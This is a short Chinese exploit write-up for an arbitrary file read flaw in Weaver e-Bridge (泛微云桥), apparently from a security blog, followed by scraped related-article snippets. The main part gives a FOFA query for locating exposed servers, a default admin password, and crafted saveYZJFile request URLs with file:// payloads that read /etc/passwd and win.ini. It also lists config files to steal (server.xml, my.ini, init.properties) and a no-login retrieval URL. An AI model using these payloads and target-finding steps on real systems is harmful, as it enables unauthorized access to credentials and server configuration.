泛微云桥e-Bridge任意文件读取漏洞

0x00漏洞影响版本:
该漏洞几乎影响2018-2019全版本。
0x01漏洞利用:
默认密码sysadmin/1
fofa搜索语句:title=“泛微云桥”


主要成因
/wxjsapi/saveYZJFil接口获取filepath,返回数据包内出现了程序的绝对路径,攻击者可以下载相关敏感文件
构造如下语句

http://x.x.x.x/wxjsapi/saveYZJFile? fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt

http://x.x.x.x/wxjsapi/saveYZJFile? fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt

相关敏感文件目录

windows: d://ebridge
linux:/usr/ebridge
etc/passwd
c://windows/win.ini
d://ebridge/tomcat/conf/server.xml
d://ebridge/mysql/my.ini d://ebridge/tomcat/webapps/ROOT/WEB-INF/classes/init.properties

获取id值

通过id值获取文件内容

http://x.x.x.x/file/fileNoLogin/cf1b577f21ad41199b82d983c89bfd05


泛微云桥e-Bridge任意文件读取相关推荐

  1. 透过2020财报,看用友、金蝶、泛微云转型

    作者 | 中国软件网 陈杨 校对丨中国软件网 海策 --- 每年3月底都是企业年财报披露扎堆的日子.受疫情影响,企业2020年财报更引人关注.对多数企业而言,疫情无疑对其经营产生了不利影响.而对ICT ...

  2. 安全研究 | Jenkins 任意文件读取漏洞分析

    欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由云鼎实验室 发表于云+社区专栏 一.漏洞背景 漏洞编号:CVE-2018-1999002 漏洞等级:高危 Jenkins 7 月 18 ...

  3. gitlab 更新文件_GitLab任意文件读取漏洞公告

    2020年4月28日,GitLab的一个任意文件读取漏洞的漏洞细节被公开.该漏洞补丁于2020年3月26号由GitLab官方发布.深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告. 漏洞 ...

  4. phpcms前台注入导致任意文件读取漏洞

    关于:phpcms前台注入导致任意文件读取漏洞的修复问题 简介: phpcms的/phpcms/modules/content/down.php文件中,对输入参数 $_GET['a_k']未进行严格过 ...

  5. Grafana 中存在严重的未授权任意文件读取漏洞,已遭利用

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Grafana Labs 发布紧急安全更新,修复了影响该公司主产品 Grafana 仪表盘中的严重漏洞 (CVE-2021-43798),CVS ...

  6. mysql任意文件读取漏洞学习

    前言 最近在做ctf题时发现关于mysql任意文件读取漏洞的考点非常频繁,而且一直都朦胧不清,也没去学习,在不久前的DDCTF和国赛,还有最近的Nu1lCTF中都考到了这个点,利用Load data ...

  7. windows文件读取 xxe_XXE任意文件读取(当xml解析内容有输出时)

    利用XXE漏洞读取文件 参考:https://www.jianshu.com/p/4fc721398e97 首先找到登录源码如下: 由题目可以利用XXE漏洞读取文件 先登录用Burp Suite抓包: ...

  8. CSS-T | Mysql Client 任意文件读取攻击链拓展

    作者:LoRexxar@知道创宇404实验室 & Dawu@知道创宇404实验室 原文地址:https://paper.seebug.org/1112/#_6 英文版本:https://pap ...

  9. CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞

    CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞 目录 漏洞原理 漏洞信息 受影响版本 FOFA搜集相关资产 漏洞分析&漏洞复现 解决方案 漏洞原理 Grafana是一 ...

  10. php 打开任意文件下载,TEC-004-php文件下载任意文件读取漏洞修复

    修改download?u参数值,将/public/files/14842030529.txt,替换为../../../../../../../../../../etc/passwd function ...

最新文章

  1. CSSE*PTC student tutoring program student lecturers of 2018-2019 Academic Year.
  2. MySQL存储引擎InnoDB,MyISAM
  3. [C/C++]关于C++11中的std::move和std::forward
  4. (3)分布式下的爬虫Scrapy应该如何做-递归爬取方式,数据输出方式以及数据库链接...
  5. python在工程管理专业的应用_专业篇丨建筑环境与能源应用工程专业和建筑电气与智能化专业...
  6. Solidity-让合约地址 接受ETH的转账充值的 三种方式
  7. ubuntu18.04多版本opencv
  8. js中 NaN、 null 及 undefined 的区别(转载)
  9. PHP开源软件《个人管理系统》-希望大家一起来开发
  10. 如何在Azure中配置SQL Server 2008 R2故障转移群集实例
  11. python 每周第一天和最后一天
  12. 二进制 八进制 十进制 转换
  13. verifier工具解决常见电脑故障
  14. var,let const,const 变量提升
  15. 运动式蓝牙耳机什么牌子好、运动式蓝牙耳机推荐
  16. 1024*1024像素的图片,文件大小多少?
  17. 大聪明教你学Java | EasyExcel - 用更简单的方式操作Excel
  18. 精馏塔控制系统的仿真与分析
  19. 2018深信服java笔试题_深信服2018春招笔试题解
  20. 大数据、java、python、区块链、人工智能发展前景

热门文章

  1. 电容或电感的电压_Buck知识大总结:模态分析,电感计算,EMI分析等(转)
  2. SIM868——GPRS调试之公网IP端口无法映射的解决方法
  3. 微信小程序点播音频服务器,微信小程序无法播放本地音频
  4. html项目组成员分工情况,课题研究小组成员分工怎么写
  5. 头文件注释轻松搞—VS2013
  6. 对象存储介绍(腾讯云cos)
  7. 高清视频录播服务器网站,高清录播服务器——DDA RSS3000
  8. 计算机组装有哪些,详解电脑组装配置有哪些
  9. pilz pnoz s4说明书_pilz安全继电器PNOZ端子及接线功能描述(中英对照版)
  10. 虚拟机win7装oracle,大神教你win7系统安装Oracle VM VirtualBox虚拟机的处理教程